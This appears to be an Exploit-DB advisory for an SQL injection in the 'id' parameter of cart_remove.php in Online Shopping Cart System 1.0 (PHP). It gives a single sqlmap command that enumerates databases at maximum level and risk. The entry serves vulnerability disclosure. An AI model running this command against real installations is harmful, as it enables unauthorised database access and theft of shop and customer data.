Online Shopping Cart System 1.0 - 'id' SQL Injection

EDB-ID:

49423

CVE:

N/A




Platform:

PHP

Date:

2021-01-14


# Exploit Title: Online Shopping Cart System 1.0 - 'id' SQL Injection
# Date: 14.1.2021
# Exploit Author: Aydın Baran Ertemir
# Vendor Homepage: https://www.sourcecodester.com/php/14668/online-shopping-cart-system-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14668&title=Online+Shopping+Cart+System+in+PHP+with+Full+Source+Code
# Version: 1.0
# Tested on: Kali Linux

Use SQLMAP:

sqlmap -u "localhost/cart_remove.php?id=1" --dbs --batch --level 3 --risk 3